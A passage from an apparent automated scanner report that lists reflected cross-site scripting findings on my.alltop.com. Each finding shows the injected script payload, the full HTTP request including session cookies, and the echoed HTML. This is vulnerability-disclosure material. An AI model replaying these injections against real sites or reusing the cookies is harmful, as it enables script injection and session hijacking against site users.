Date: Tue, 08 Mar 2011 20:50:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:31 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:32 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:32 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/g/%22ns=%22netsparker(0x000191)?53d96"><script>alert(1)</script>645dacf2bc=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.129. http://my.alltop.com/alpha/g/%2522ns%253D%2522netsparker%25280x000197%2529) [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/g/%2522ns%253D%2522netsparker%25280x000197%2529)

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c61a"><script>alert(1)</script>6b3fbe1bdcf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/g7c61a"><script>alert(1)</script>6b3fbe1bdcf/%2522ns%253D%2522netsparker%25280x000197%2529) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:27 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:27 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:29 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:29 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/g7c61a"><script>alert(1)</script>6b3fbe1bdcf/%2522ns%253D%2522netsparker%25280x000197%2529)" method="post" accept-charset="utf-8">
...[SNIP]...

1.130. http://my.alltop.com/alpha/g/%2522ns%253D%2522netsparker%25280x000197%2529) [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/g/%2522ns%253D%2522netsparker%25280x000197%2529)

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 876d2"><script>alert(1)</script>f65e190f11c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/g/%2522ns%253D%2522netsparker%25280x000197%2529)876d2"><script>alert(1)</script>f65e190f11c HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:31 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:32 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:32 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/g/%2522ns%253D%2522netsparker%25280x000197%2529)876d2"><script>alert(1)</script>f65e190f11c" method="post" accept-charset="utf-8">
...[SNIP]...

1.131. http://my.alltop.com/alpha/g/%2522ns%253D%2522netsparker%25280x000197%2529) [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/g/%2522ns%253D%2522netsparker%25280x000197%2529)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e214"><script>alert(1)</script>14d0a0fe06d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/g/%2522ns%253D%2522netsparker%25280x000197%2529)?5e214"><script>alert(1)</script>14d0a0fe06d=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:22 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:23 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:23 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/g/%2522ns%253D%2522netsparker%25280x000197%2529)?5e214"><script>alert(1)</script>14d0a0fe06d=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.132. http://my.alltop.com/alpha/h ['"--> parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/h

Issue detail

The value of the '"--></style></script><script>netsparker(0x0001C2)</script> request parameter is copied into the HTML document as plain text between tags. The payload 36b86<script>alert(1)</script>1af0142b44e was submitted in the '"--></style></script><script>netsparker(0x0001C2)</script> parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/h?'"--></style></script><script>netsparker(0x0001C2)</script>36b86<script>alert(1)</script>1af0142b44e HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:37 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:37 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:37 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
</script>36b86<script>alert(1)</script>1af0142b44e" method="post" accept-charset="utf-8">
...[SNIP]...

1.133. http://my.alltop.com/alpha/h [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/h

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a71a2"><script>alert(1)</script>e713231d700 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/ha71a2"><script>alert(1)</script>e713231d700 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:53 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:53 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:53 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/ha71a2"><script>alert(1)</script>e713231d700" method="post" accept-charset="utf-8">
...[SNIP]...

1.134. http://my.alltop.com/alpha/h [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/h

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a799c"><script>alert(1)</script>ba97f7fba3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/h?a799c"><script>alert(1)</script>ba97f7fba3=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:51 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:52 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:52 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/h?a799c"><script>alert(1)</script>ba97f7fba3=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.135. http://my.alltop.com/alpha/h [nsextt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/h

Issue detail

The value of the nsextt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0c76"><script>alert(1)</script>e2680cd3844 was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/h?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000149)%3C/script%3Eb0c76"><script>alert(1)</script>e2680cd3844 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:52 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:53 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:53 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/h?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000149)%3C/script%3Eb0c76"><script>alert(1)</script>e2680cd3844" method="post" accept-charset="utf-8">
...[SNIP]...

1.136. http://my.alltop.com/alpha/h'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AB)%3C/script%3E [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/h'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AB)%3C/script%3E

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bac43"><script>alert(1)</script>f6cacb4a969 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/h'%22--%3E%3Cbac43"><script>alert(1)</script>f6cacb4a969/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AB)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:43 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:46 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:46 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/h'%22--%3E%3Cbac43"><script>alert(1)</script>f6cacb4a969/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AB)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.137. http://my.alltop.com/alpha/h'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AB)%3C/script%3E [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/h'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AB)%3C/script%3E

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5430b"><script>alert(1)</script>c9395a1a119 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/h'%22--%3E%3C/style%3E%3C5430b"><script>alert(1)</script>c9395a1a119/script%3E%3Cscript%3Enetsparker(0x0001AB)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
